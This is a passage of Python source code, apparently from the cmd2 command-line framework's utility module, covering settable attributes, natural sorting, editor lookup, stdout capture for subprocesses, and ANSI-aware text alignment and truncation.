def set_value(self, value: Any) -> Any:
"""
Set the settable attribute on the specified destination object
:param value: New value to set
:return: New value that the attribute was set to
"""
# Run the value through its type function to handle any conversion or validation
new_value = self.val_type(value)
# Make sure new_value is a valid choice
if self.choices is not None and new_value not in self.choices:
choices_str = ', '.join(map(repr, self.choices))
raise ValueError(f"invalid choice: {new_value!r} (choose from {choices_str})")
# Try to update the settable's value
orig_value = self.get_value()
setattr(self.settable_obj, self.settable_attrib_name, new_value)
# Check if we need to call an onchange callback
if orig_value != new_value and self.onchange_cb:
self.onchange_cb(self.name, orig_value, new_value)
return new_value
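# Illustrative sketch of registering a settable attribute (the attribute name, description,
# and onchange callback below are hypothetical):
#   settable = Settable('timeout', int, 'Timeout in seconds', self, onchange_cb=self._on_timeout_changed)
#   settable.set_value('30')   # cast via int(), validated against choices, then onchange_cb fires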
def is_text_file(file_path: str) -> bool:
"""Returns if a file contains only ASCII or UTF-8 encoded text and isn't empty.
:param file_path: path to the file being checked
:return: True if the file is a non-empty text file, otherwise False
:raises OSError if file can't be read
"""
import codecs
expanded_path = os.path.abspath(os.path.expanduser(file_path.strip()))
valid_text_file = False
# Only need to check for utf-8 compliance since that covers ASCII, too
try:
with codecs.open(expanded_path, encoding='utf-8', errors='strict') as f:
# Make sure the file has only utf-8 text and is not empty
if sum(1 for _ in f) > 0:
valid_text_file = True
except OSError:
raise
except UnicodeDecodeError:
# Not UTF-8
pass
return valid_text_file
def remove_duplicates(list_to_prune: List[_T]) -> List[_T]:
"""Removes duplicates from a list while preserving order of the items.
:param list_to_prune: the list being pruned of duplicates
:return: The pruned list
"""
temp_dict: collections.OrderedDict[_T, Any] = collections.OrderedDict()
for item in list_to_prune:
temp_dict[item] = None
return list(temp_dict.keys())
def norm_fold(astr: str) -> str:
"""Normalize and casefold Unicode strings for saner comparisons.
:param astr: input unicode string
:return: a normalized and case-folded version of the input string
"""
return unicodedata.normalize('NFC', astr).casefold()
def alphabetical_sort(list_to_sort: Iterable[str]) -> List[str]:
"""Sorts a list of strings alphabetically.
For example: ['a1', 'A11', 'A2', 'a22', 'a3']
To sort a list in place, don't call this method, which makes a copy. Instead, do this:
my_list.sort(key=norm_fold)
:param list_to_sort: the list being sorted
:return: the sorted list
"""
return sorted(list_to_sort, key=norm_fold)
def try_int_or_force_to_lower_case(input_str: str) -> Union[int, str]:
"""
Tries to convert the passed-in string to an integer. If that fails, it converts it to lower case using norm_fold.
:param input_str: string to convert
:return: the string as an integer or a lower case version of the string
"""
try:
return int(input_str)
except ValueError:
return norm_fold(input_str)
def natural_keys(input_str: str) -> List[Union[int, str]]:
"""
Converts a string into a list of integers and strings to support natural sorting (see natural_sort).
For example: natural_keys('abc123def') -> ['abc', '123', 'def']
:param input_str: string to convert
:return: list of strings and integers
"""
return [try_int_or_force_to_lower_case(substr) for substr in re.split(r'(\d+)', input_str)]
def natural_sort(list_to_sort: Iterable[str]) -> List[str]:
"""
Sorts a list of strings case insensitively as well as numerically.
For example: ['a1', 'A2', 'a3', 'A11', 'a22']
To sort a list in place, don't call this method, which makes a copy. Instead, do this:
my_list.sort(key=natural_keys)
:param list_to_sort: the list being sorted
:return: the list sorted naturally
"""
return sorted(list_to_sort, key=natural_keys)
def quote_specific_tokens(tokens: List[str], tokens_to_quote: List[str]) -> None:
"""
Quote specific tokens in a list
:param tokens: token list being edited
:param tokens_to_quote: the tokens, which if present in tokens, to quote
"""
for i, token in enumerate(tokens):
if token in tokens_to_quote:
tokens[i] = quote_string(token)
def unquote_specific_tokens(tokens: List[str], tokens_to_unquote: List[str]) -> None:
"""
Unquote specific tokens in a list
:param tokens: token list being edited
:param tokens_to_unquote: the tokens, which if present in tokens, to unquote
"""
for i, token in enumerate(tokens):
unquoted_token = strip_quotes(token)
if unquoted_token in tokens_to_unquote:
tokens[i] = unquoted_token
def expand_user(token: str) -> str:
"""
Wrap os.expanduser() to support expanding ~ in quoted strings
:param token: the string to expand
"""
if token:
if is_quoted(token):
quote_char = token[0]
token = strip_quotes(token)
else:
quote_char = ''
token = os.path.expanduser(token)
# Restore the quotes even if not needed to preserve what the user typed
if quote_char:
token = quote_char + token + quote_char
return token
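# Example (the home directory shown is hypothetical):
#   expand_user('"~/notes.txt"') -> '"/home/user/notes.txt"'   # quotes are preserved around the expansion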
def expand_user_in_tokens(tokens: List[str]) -> None:
"""
Call expand_user() on all tokens in a list of strings
:param tokens: tokens to expand
"""
for index, _ in enumerate(tokens):
tokens[index] = expand_user(tokens[index])
def find_editor() -> Optional[str]:
"""
Used to set cmd2.Cmd.DEFAULT_EDITOR. If EDITOR env variable is set, that will be used.
Otherwise the function will look for a known editor in directories specified by PATH env variable.
:return: Default editor or None
"""
editor = os.environ.get('EDITOR')
if not editor:
if sys.platform[:3] == 'win':
editors = ['code.cmd', 'notepad++.exe', 'notepad.exe']
else:
editors = ['vim', 'vi', 'emacs', 'nano', 'pico', 'joe', 'code', 'subl', 'atom', 'gedit', 'geany', 'kate']
# Get a list of every directory in the PATH environment variable and ignore symbolic links
env_path = os.getenv('PATH')
if env_path is None:
paths = []
else:
paths = [p for p in env_path.split(os.path.pathsep) if not os.path.islink(p)]
for editor, path in itertools.product(editors, paths):
editor_path = os.path.join(path, editor)
if os.path.isfile(editor_path) and os.access(editor_path, os.X_OK):
if sys.platform[:3] == 'win':
# Remove extension from Windows file names
editor = os.path.splitext(editor)[0]
break
else:
editor = None
return editor
def files_from_glob_pattern(pattern: str, access: int = os.F_OK) -> List[str]:
"""Return a list of file paths based on a glob pattern.
    Only files are returned, not directories, and optionally only files to which the user has the specified access.
:param pattern: file name or glob pattern
:param access: file access type to verify (os.* where * is F_OK, R_OK, W_OK, or X_OK)
:return: list of files matching the name or glob pattern
"""
return [f for f in glob.glob(pattern) if os.path.isfile(f) and os.access(f, access)]
def files_from_glob_patterns(patterns: List[str], access: int = os.F_OK) -> List[str]:
"""Return a list of file paths based on a list of glob patterns.
    Only files are returned, not directories, and optionally only files to which the user has the specified access.
:param patterns: list of file names and/or glob patterns
:param access: file access type to verify (os.* where * is F_OK, R_OK, W_OK, or X_OK)
:return: list of files matching the names and/or glob patterns
"""
files = []
for pattern in patterns:
matches = files_from_glob_pattern(pattern, access=access)
files.extend(matches)
return files
def get_exes_in_path(starts_with: str) -> List[str]:
"""Returns names of executables in a user's path
    :param starts_with: what the exes should start with. Leave blank for all exes in the path.
:return: a list of matching exe names
"""
# Purposely don't match any executable containing wildcards
wildcards = ['*', '?']
for wildcard in wildcards:
if wildcard in starts_with:
return []
# Get a list of every directory in the PATH environment variable and ignore symbolic links
env_path = os.getenv('PATH')
if env_path is None:
paths = []
else:
paths = [p for p in env_path.split(os.path.pathsep) if not os.path.islink(p)]
# Use a set to store exe names since there can be duplicates
exes_set = set()
# Find every executable file in the user's path that matches the pattern
for path in paths:
full_path = os.path.join(path, starts_with)
matches = files_from_glob_pattern(full_path + '*', access=os.X_OK)
for match in matches:
exes_set.add(os.path.basename(match))
return list(exes_set)
class StdSim:
"""
Class to simulate behavior of sys.stdout or sys.stderr.
Stores contents in internal buffer and optionally echos to the inner stream it is simulating.
"""
def __init__(
self,
inner_stream: Union[TextIO, 'StdSim'],
*,
echo: bool = False,
encoding: str = 'utf-8',
errors: str = 'replace',
) -> None:
"""
StdSim Initializer
:param inner_stream: the wrapped stream. Should be a TextIO or StdSim instance.
:param echo: if True, then all input will be echoed to inner_stream
:param encoding: codec for encoding/decoding strings (defaults to utf-8)
:param errors: how to handle encoding/decoding errors (defaults to replace)
"""
self.inner_stream = inner_stream
self.echo = echo
self.encoding = encoding
self.errors = errors
self.pause_storage = False
self.buffer = ByteBuf(self)
def write(self, s: str) -> None:
"""
Add str to internal bytes buffer and if echo is True, echo contents to inner stream
:param s: String to write to the stream
"""
if not isinstance(s, str):
raise TypeError(f'write() argument must be str, not {type(s)}')
if not self.pause_storage:
self.buffer.byte_buf += s.encode(encoding=self.encoding, errors=self.errors)
if self.echo:
self.inner_stream.write(s)
def getvalue(self) -> str:
"""Get the internal contents as a str"""
return self.buffer.byte_buf.decode(encoding=self.encoding, errors=self.errors)
def getbytes(self) -> bytes:
"""Get the internal contents as bytes"""
return bytes(self.buffer.byte_buf)
def read(self, size: Optional[int] = -1) -> str:
"""
Read from the internal contents as a str and then clear them out
:param size: Number of bytes to read from the stream
"""
if size is None or size == -1:
result = self.getvalue()
self.clear()
else:
result = self.buffer.byte_buf[:size].decode(encoding=self.encoding, errors=self.errors)
self.buffer.byte_buf = self.buffer.byte_buf[size:]
return result
def readbytes(self) -> bytes:
"""Read from the internal contents as bytes and then clear them out"""
result = self.getbytes()
self.clear()
return result
def clear(self) -> None:
"""Clear the internal contents"""
self.buffer.byte_buf.clear()
def isatty(self) -> bool:
"""StdSim only considered an interactive stream if `echo` is True and `inner_stream` is a tty."""
if self.echo:
return self.inner_stream.isatty()
else:
return False
@property
def line_buffering(self) -> bool:
"""
Handle when the inner stream doesn't have a line_buffering attribute which is the case
when running unit tests because pytest sets stdout to a pytest EncodedFile object.
"""
try:
return bool(self.inner_stream.line_buffering)
except AttributeError:
return False
def __getattr__(self, item: str) -> Any:
if item in self.__dict__:
return self.__dict__[item]
else:
return getattr(self.inner_stream, item)
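# Minimal usage sketch for StdSim:
#   sim = StdSim(sys.stdout, echo=False)
#   sim.write('hello\n')        # stored in the internal buffer only; echoed if echo=True
#   captured = sim.getvalue()   # -> 'hello\n'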
class ByteBuf:
"""
Used by StdSim to write binary data and stores the actual bytes written
"""
# Used to know when to flush the StdSim
NEWLINES = [b'\n', b'\r']
def __init__(self, std_sim_instance: StdSim) -> None:
self.byte_buf = bytearray()
self.std_sim_instance = std_sim_instance
def write(self, b: bytes) -> None:
"""Add bytes to internal bytes buffer and if echo is True, echo contents to inner stream."""
if not isinstance(b, bytes):
raise TypeError(f'a bytes-like object is required, not {type(b)}')
if not self.std_sim_instance.pause_storage:
self.byte_buf += b
if self.std_sim_instance.echo:
self.std_sim_instance.inner_stream.buffer.write(b)
# Since StdSim wraps TextIO streams, we will flush the stream if line buffering is on
# and the bytes being written contain a new line character. This is helpful when StdSim
# is being used to capture output of a shell command because it causes the output to print
# to the screen more often than if we waited for the stream to flush its buffer.
if self.std_sim_instance.line_buffering:
if any(newline in b for newline in ByteBuf.NEWLINES):
self.std_sim_instance.flush()
class ProcReader:
"""
Used to capture stdout and stderr from a Popen process if any of those were set to subprocess.PIPE.
If neither are pipes, then the process will run normally and no output will be captured.
"""
def __init__(self, proc: PopenTextIO, stdout: Union[StdSim, TextIO], stderr: Union[StdSim, TextIO]) -> None:
"""
ProcReader initializer
:param proc: the Popen process being read from
:param stdout: the stream to write captured stdout
:param stderr: the stream to write captured stderr
"""
self._proc = proc
self._stdout = stdout
self._stderr = stderr
self._out_thread = threading.Thread(name='out_thread', target=self._reader_thread_func, kwargs={'read_stdout': True})
self._err_thread = threading.Thread(name='err_thread', target=self._reader_thread_func, kwargs={'read_stdout': False})
# Start the reader threads for pipes only
if self._proc.stdout is not None:
self._out_thread.start()
if self._proc.stderr is not None:
self._err_thread.start()
def send_sigint(self) -> None:
"""Send a SIGINT to the process similar to if <Ctrl>+C were pressed"""
import signal
if sys.platform.startswith('win'):
# cmd2 started the Windows process in a new process group. Therefore we must send
# a CTRL_BREAK_EVENT since CTRL_C_EVENT signals cannot be generated for process groups.
self._proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
# Since cmd2 uses shell=True in its Popen calls, we need to send the SIGINT to
# the whole process group to make sure it propagates further than the shell
try:
group_id = os.getpgid(self._proc.pid)
os.killpg(group_id, signal.SIGINT)
except ProcessLookupError:
return
def terminate(self) -> None:
"""Terminate the process"""
self._proc.terminate()
def wait(self) -> None:
"""Wait for the process to finish"""
if self._out_thread.is_alive():
self._out_thread.join()
if self._err_thread.is_alive():
self._err_thread.join()
# Handle case where the process ended before the last read could be done.
# This will return None for the streams that weren't pipes.
out, err = self._proc.communicate()
if out:
self._write_bytes(self._stdout, out)
if err:
self._write_bytes(self._stderr, err)
def _reader_thread_func(self, read_stdout: bool) -> None:
"""
Thread function that reads a stream from the process
:param read_stdout: if True, then this thread deals with stdout. Otherwise it deals with stderr.
"""
if read_stdout:
read_stream = self._proc.stdout
write_stream = self._stdout
else:
read_stream = self._proc.stderr
write_stream = self._stderr
# The thread should have been started only if this stream was a pipe
assert read_stream is not None
# Run until process completes
while self._proc.poll() is None:
# noinspection PyUnresolvedReferences
available = read_stream.peek() # type: ignore[attr-defined]
if available:
read_stream.read(len(available))
self._write_bytes(write_stream, available)
@staticmethod
def _write_bytes(stream: Union[StdSim, TextIO], to_write: bytes) -> None:
"""
Write bytes to a stream
:param stream: the stream being written to
:param to_write: the bytes being written
"""
try:
stream.buffer.write(to_write)
except BrokenPipeError:
# This occurs if output is being piped to a process that closed
pass
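# Minimal usage sketch for ProcReader (the shell command is hypothetical):
#   proc = subprocess.Popen('echo hi', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#   reader = ProcReader(proc, sys.stdout, sys.stderr)
#   reader.wait()   # reader threads copy the piped output to the supplied streams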
class ContextFlag:
"""A context manager which is also used as a boolean flag value within the default sigint handler.
Its main use is as a flag to prevent the SIGINT handler in cmd2 from raising a KeyboardInterrupt
while a critical code section has set the flag to True. Because signal handling is always done on the
main thread, this class is not thread-safe since there is no need.
"""
def __init__(self) -> None:
# When this flag has a positive value, it is considered set.
# When it is 0, it is not set. It should never go below 0.
self.__count = 0
def __bool__(self) -> bool:
return self.__count > 0
def __enter__(self) -> None:
self.__count += 1
def __exit__(self, *args: Any) -> None:
self.__count -= 1
if self.__count < 0:
raise ValueError("count has gone below 0")
class RedirectionSavedState:
"""Created by each command to store information required to restore state after redirection"""
def __init__(
self,
self_stdout: Union[StdSim, TextIO],
sys_stdout: Union[StdSim, TextIO],
pipe_proc_reader: Optional[ProcReader],
saved_redirecting: bool,
) -> None:
"""
RedirectionSavedState initializer
:param self_stdout: saved value of Cmd.stdout
:param sys_stdout: saved value of sys.stdout
:param pipe_proc_reader: saved value of Cmd._cur_pipe_proc_reader
:param saved_redirecting: saved value of Cmd._redirecting
"""
# Tells if command is redirecting
self.redirecting = False
# Used to restore values after redirection ends
self.saved_self_stdout = self_stdout
self.saved_sys_stdout = sys_stdout
# Used to restore values after command ends regardless of whether the command redirected
self.saved_pipe_proc_reader = pipe_proc_reader
self.saved_redirecting = saved_redirecting
def _remove_overridden_styles(styles_to_parse: List[str]) -> List[str]:
"""
Utility function for align_text() / truncate_line() which filters a style list down
to only those which would still be in effect if all were processed in order.
This is mainly used to reduce how many style strings are stored in memory when
building large multiline strings with ANSI styles. We only need to carry over
styles from previous lines that are still in effect.
:param styles_to_parse: list of styles to evaluate.
:return: list of styles that are still in effect.
"""
from . import (
ansi,
)
class StyleState:
"""Keeps track of what text styles are enabled"""
def __init__(self) -> None:
# Contains styles still in effect, keyed by their index in styles_to_parse
self.style_dict: Dict[int, str] = dict()
# Indexes into style_dict
self.reset_all: Optional[int] = None
self.fg: Optional[int] = None
self.bg: Optional[int] = None
self.intensity: Optional[int] = None
self.italic: Optional[int] = None
self.overline: Optional[int] = None
self.strikethrough: Optional[int] = None
self.underline: Optional[int] = None
# Read the previous styles in order and keep track of their states
style_state = StyleState()
for index, style in enumerate(styles_to_parse):
# For styles types that we recognize, only keep their latest value from styles_to_parse.
# All unrecognized style types will be retained and their order preserved.
if style in (str(ansi.TextStyle.RESET_ALL), str(ansi.TextStyle.ALT_RESET_ALL)):
style_state = StyleState()
style_state.reset_all = index
elif ansi.STD_FG_RE.match(style) or ansi.EIGHT_BIT_FG_RE.match(style) or ansi.RGB_FG_RE.match(style):
if style_state.fg is not None:
style_state.style_dict.pop(style_state.fg)
style_state.fg = index
elif ansi.STD_BG_RE.match(style) or ansi.EIGHT_BIT_BG_RE.match(style) or ansi.RGB_BG_RE.match(style):
if style_state.bg is not None:
style_state.style_dict.pop(style_state.bg)
style_state.bg = index
elif style in (
str(ansi.TextStyle.INTENSITY_BOLD),
str(ansi.TextStyle.INTENSITY_DIM),
str(ansi.TextStyle.INTENSITY_NORMAL),
):
if style_state.intensity is not None:
style_state.style_dict.pop(style_state.intensity)
style_state.intensity = index
elif style in (str(ansi.TextStyle.ITALIC_ENABLE), str(ansi.TextStyle.ITALIC_DISABLE)):
if style_state.italic is not None:
style_state.style_dict.pop(style_state.italic)
style_state.italic = index
elif style in (str(ansi.TextStyle.OVERLINE_ENABLE), str(ansi.TextStyle.OVERLINE_DISABLE)):
if style_state.overline is not None:
style_state.style_dict.pop(style_state.overline)
style_state.overline = index
elif style in (str(ansi.TextStyle.STRIKETHROUGH_ENABLE), str(ansi.TextStyle.STRIKETHROUGH_DISABLE)):
if style_state.strikethrough is not None:
style_state.style_dict.pop(style_state.strikethrough)
style_state.strikethrough = index
elif style in (str(ansi.TextStyle.UNDERLINE_ENABLE), str(ansi.TextStyle.UNDERLINE_DISABLE)):
if style_state.underline is not None:
style_state.style_dict.pop(style_state.underline)
style_state.underline = index
# Store this style and its location in the dictionary
style_state.style_dict[index] = style
return list(style_state.style_dict.values())
class TextAlignment(Enum):
"""Horizontal text alignment"""
LEFT = 1
CENTER = 2
RIGHT = 3
def align_text(
text: str,
alignment: TextAlignment,
*,
fill_char: str = ' ',
width: Optional[int] = None,
tab_width: int = 4,
truncate: bool = False,
) -> str:
"""
Align text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
There are convenience wrappers around this function: align_left(), align_center(), and align_right()
:param text: text to align (can contain multiple lines)
:param alignment: how to align the text
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
    :param tab_width: any tabs in the text will be replaced with this many spaces. If fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then each line will be shortened to fit within the display width. The truncated
portions are replaced by a '…' character. Defaults to False.
:return: aligned text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
import io
import shutil
from . import (
ansi,
)
if width is None:
width = shutil.get_terminal_size().columns
if width < 1:
raise ValueError("width must be at least 1")
# Convert tabs to spaces
text = text.replace('\t', ' ' * tab_width)
fill_char = fill_char.replace('\t', ' ')
# Save fill_char with no styles for use later
stripped_fill_char = ansi.strip_style(fill_char)
if len(stripped_fill_char) != 1:
raise TypeError("Fill character must be exactly one character long")
fill_char_width = ansi.style_aware_wcswidth(fill_char)
if fill_char_width == -1:
raise (ValueError("Fill character is an unprintable character"))
# Isolate the style chars before and after the fill character. We will use them when building sequences of
# fill characters. Instead of repeating the style characters for each fill character, we'll wrap each sequence.
fill_char_style_begin, fill_char_style_end = fill_char.split(stripped_fill_char)
if text:
lines = text.splitlines()
else:
lines = ['']
text_buf = io.StringIO()
# ANSI style sequences that may affect subsequent lines will be cancelled by the fill_char's style.
# To avoid this, we save styles which are still in effect so we can restore them when beginning the next line.
# This also allows lines to be used independently and still have their style. TableCreator does this.
previous_styles: List[str] = []
for index, line in enumerate(lines):
if index > 0:
text_buf.write('\n')
if truncate:
line = truncate_line(line, width)
line_width = ansi.style_aware_wcswidth(line)
if line_width == -1:
raise (ValueError("Text to align contains an unprintable character"))
# Get list of styles in this line
line_styles = list(get_styles_dict(line).values())
# Calculate how wide each side of filling needs to be
if line_width >= width:
# Don't return here even though the line needs no fill chars.
# There may be styles sequences to restore.
total_fill_width = 0
else:
total_fill_width = width - line_width
if alignment == TextAlignment.LEFT:
left_fill_width = 0
right_fill_width = total_fill_width
elif alignment == TextAlignment.CENTER:
left_fill_width = total_fill_width // 2
right_fill_width = total_fill_width - left_fill_width
else:
left_fill_width = total_fill_width
right_fill_width = 0
# Determine how many fill characters are needed to cover the width
left_fill = (left_fill_width // fill_char_width) * stripped_fill_char
right_fill = (right_fill_width // fill_char_width) * stripped_fill_char
# In cases where the fill character display width didn't divide evenly into
# the gap being filled, pad the remainder with space.
left_fill += ' ' * (left_fill_width - ansi.style_aware_wcswidth(left_fill))
right_fill += ' ' * (right_fill_width - ansi.style_aware_wcswidth(right_fill))
# Don't allow styles in fill characters and text to affect one another
if fill_char_style_begin or fill_char_style_end or previous_styles or line_styles:
if left_fill:
left_fill = ansi.TextStyle.RESET_ALL + fill_char_style_begin + left_fill + fill_char_style_end
left_fill += ansi.TextStyle.RESET_ALL
if right_fill:
right_fill = ansi.TextStyle.RESET_ALL + fill_char_style_begin + right_fill + fill_char_style_end
right_fill += ansi.TextStyle.RESET_ALL
# Write the line and restore styles from previous lines which are still in effect
text_buf.write(left_fill + ''.join(previous_styles) + line + right_fill)
# Update list of styles that are still in effect for the next line
previous_styles.extend(line_styles)
previous_styles = _remove_overridden_styles(previous_styles)
return text_buf.getvalue()
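# Worked example (no ANSI styles involved):
#   align_text('hi', TextAlignment.CENTER, fill_char='-', width=6) -> '--hi--'
#   (the 4 spare columns are split 2/2 around the 2-column text)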
def align_left(
text: str, *, fill_char: str = ' ', width: Optional[int] = None, tab_width: int = 4, truncate: bool = False
) -> str:
"""
Left align text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
:param text: text to left align (can contain multiple lines)
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
    :param tab_width: any tabs in the text will be replaced with this many spaces. If fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then text will be shortened to fit within the display width. The truncated portion is
replaced by a '…' character. Defaults to False.
:return: left-aligned text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
return align_text(text, TextAlignment.LEFT, fill_char=fill_char, width=width, tab_width=tab_width, truncate=truncate)
def align_center(
text: str, *, fill_char: str = ' ', width: Optional[int] = None, tab_width: int = 4, truncate: bool = False
) -> str:
"""
Center text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
:param text: text to center (can contain multiple lines)
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
    :param tab_width: any tabs in the text will be replaced with this many spaces. If fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then text will be shortened to fit within the display width. The truncated portion is
replaced by a '…' character. Defaults to False.
:return: centered text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
return align_text(text, TextAlignment.CENTER, fill_char=fill_char, width=width, tab_width=tab_width, truncate=truncate)
def align_right(
text: str, *, fill_char: str = ' ', width: Optional[int] = None, tab_width: int = 4, truncate: bool = False
) -> str:
"""
Right align text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
:param text: text to right align (can contain multiple lines)
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
:param tab_width: any tabs in the text will be replaced with this many spaces. if fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then text will be shortened to fit within the display width. The truncated portion is
replaced by a '…' character. Defaults to False.
:return: right-aligned text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
return align_text(text, TextAlignment.RIGHT, fill_char=fill_char, width=width, tab_width=tab_width, truncate=truncate)
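# Hedged usage sketch (not part of cmd2 itself): the three wrappers above all
# delegate to align_text() and differ only in the TextAlignment value passed.
# With an explicit width the calls behave like this:
#
#   align_left('hi', fill_char='-', width=6)    -> 'hi----'
#   align_center('hi', fill_char='-', width=6)  -> '--hi--'
#   align_right('hi', fill_char='-', width=6)   -> '----hi'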
def truncate_line(line: str, max_width: int, *, tab_width: int = 4) -> str:
"""
Truncate a single line to fit within a given display width. Any portion of the string that is truncated
is replaced by a '…' character. Supports characters with display widths greater than 1. ANSI style sequences
do not count toward the display width.
If there are ANSI style sequences in the string after where truncation occurs, this function will append them
to the returned string.
This is done to prevent issues caused in cases like: truncate_line(Fg.BLUE + hello + Fg.RESET, 3)
In this case, "hello" would be truncated before Fg.RESET resets the color from blue. Appending the remaining style
sequences makes sure the style is in the same state had the entire string been printed. align_text() relies on this
behavior when preserving style over multiple lines.
:param line: text to truncate
:param max_width: the maximum display width the resulting string is allowed to have
:param tab_width: any tabs in the text will be replaced with this many spaces
:return: line that has a display width less than or equal to width
:raises: ValueError if text contains an unprintable character like a newline
:raises: ValueError if max_width is less than 1
"""
import io
from . import (
ansi,
)
# Handle tabs
line = line.replace('\t', ' ' * tab_width)
if ansi.style_aware_wcswidth(line) == -1:
raise ValueError("text contains an unprintable character")
if max_width < 1:
raise ValueError("max_width must be at least 1")
if ansi.style_aware_wcswidth(line) <= max_width:
return line
# Find all style sequences in the line
styles_dict = get_styles_dict(line)
# Add characters one by one and preserve all style sequences
done = False
index = 0
total_width = 0
truncated_buf = io.StringIO()
while not done:
# Check if a style sequence is at this index. These don't count toward display width.
if index in styles_dict:
truncated_buf.write(styles_dict[index])
style_len = len(styles_dict[index])
styles_dict.pop(index)
index += style_len
continue
char = line[index]
char_width = ansi.style_aware_wcswidth(char)
# This char will make the text too wide, add the ellipsis instead
if char_width + total_width >= max_width:
char = constants.HORIZONTAL_ELLIPSIS
char_width = ansi.style_aware_wcswidth(char)
done = True
total_width += char_width
truncated_buf.write(char)
index += 1
# Filter out overridden styles from the remaining ones
remaining_styles = _remove_overridden_styles(list(styles_dict.values()))
# Append the remaining styles to the truncated text
truncated_buf.write(''.join(remaining_styles))
return truncated_buf.getvalue()
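# Illustrative sketch only: truncate_line() replaces the cut-off portion with a
# single '…' and re-appends any ANSI sequences that followed the cut so styles
# stay balanced. With a hypothetical blue/reset pair:
#
#   truncate_line(BLUE + 'hello' + RESET, 3)  ->  BLUE + 'he' + '…' + RESET
#
# i.e. the result has a display width of 3 and the reset sequence is preserved.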
def get_styles_dict(text: str) -> Dict[int, str]:
"""
Return an OrderedDict containing all ANSI style sequences found in a string
The structure of the dictionary is:
key: index where the sequence begins
value: ANSI style sequence found at index in text
Keys are in ascending order
:param text: text to search for style sequences
"""
from . import (
ansi,
)
start = 0
styles = collections.OrderedDict()
while True:
match = ansi.ANSI_STYLE_RE.search(text, start)
if match is None:
break
styles[match.start()] = match.group()
start += len(match.group())
return styles
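# Small sketch (assumed values) of the mapping get_styles_dict() returns: for a
# string such as '\x1b[31m' + 'hi' + '\x1b[39m' the dict maps the index where
# each ANSI sequence starts to the sequence itself, e.g.
#
#   {0: '\x1b[31m', 7: '\x1b[39m'}
#
# since the 5-character red sequence occupies indices 0-4 and 'hi' indices 5-6.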
def categorize(func: Union[Callable[..., Any], Iterable[Callable[..., Any]]], category: str) -> None:
"""Categorize a function.
The help command output will group the passed function under the
specified category heading
:param func: function or list of functions to categorize
:param category: category to put it in
:Example:
>>> import cmd2
>>> class MyApp(cmd2.Cmd):
>>> def do_echo(self, arglist):
>>> self.poutput(' '.join(arglist))
>>>
>>> cmd2.utils.categorize(do_echo, "Text Processing")
For an alternative approach to categorizing commands using a decorator, see
:func:`~cmd2.decorators.with_category`
"""
if isinstance(func, Iterable):
for item in func:
setattr(item, constants.CMD_ATTR_HELP_CATEGORY, category)
else:
if inspect.ismethod(func):
setattr(func.__func__, constants.CMD_ATTR_HELP_CATEGORY, category) # type: ignore[attr-defined]
else:
setattr(func, constants.CMD_ATTR_HELP_CATEGORY, category)
def get_defining_class(meth: Callable[..., Any]) -> Optional[Type[Any]]:
"""
Attempts to resolve the class that defined a method.
Inspired by implementation published here:
https://stackoverflow.com/a/25959545/1956611
:param meth: method to inspect
:return: class type in which the supplied method was defined. None if it couldn't be resolved.
"""
if isinstance(meth, functools.partial):
return get_defining_class(meth.func)
if inspect.ismethod(meth) or (
inspect.isbuiltin(meth)
and getattr(meth, '__self__') is not None
and getattr(meth.__self__, '__class__') # type: ignore[attr-defined]
):
for cls in inspect.getmro(meth.__self__.__class__): # type: ignore[attr-defined]
if meth.__name__ in cls.__dict__:
return cls
meth = getattr(meth, '__func__', meth) # fallback to __qualname__ parsing
if inspect.isfunction(meth):
cls = getattr(inspect.getmodule(meth), meth.__qualname__.split('.<locals>', 1)[0].rsplit('.', 1)[0])
if isinstance(cls, type):
return cls
return cast(type, getattr(meth, '__objclass__', None)) # handle special descriptor objects
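# Hedged example of how get_defining_class() resolves a bound method (class and
# method names here are illustrative):
#
#   class Base:
#       def greet(self): ...
#   class Child(Base):
#       pass
#
#   get_defining_class(Child().greet)  # -> Base, since 'greet' is in Base.__dict__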
class CompletionMode(Enum):
"""Enum for what type of tab completion to perform in cmd2.Cmd.read_input()"""
# Tab completion will be disabled during read_input() call
# Use of custom up-arrow history supported
NONE = 1
# read_input() will tab complete cmd2 commands and their arguments
# cmd2's command line history will be used for up arrow if history is not provided.
# Otherwise use of custom up-arrow history supported.
COMMANDS = 2
# read_input() will tab complete based on one of its following parameters:
# choices, choices_provider, completer, parser
# Use of custom up-arrow history supported
CUSTOM = 3
class CustomCompletionSettings:
"""Used by cmd2.Cmd.complete() to tab complete strings other than command arguments"""
def __init__(self, parser: argparse.ArgumentParser, *, preserve_quotes: bool = False) -> None:
"""
Initializer
:param parser: arg parser defining format of string being tab completed
:param preserve_quotes: if True, then quoted tokens will keep their quotes when processed by
ArgparseCompleter. This is helpful in cases when you're tab completing
flag-like tokens (e.g. -o, --option) and you don't want them to be
treated as argparse flags when quoted. Set this to True if you plan
on passing the string to argparse with the tokens still quoted.
"""
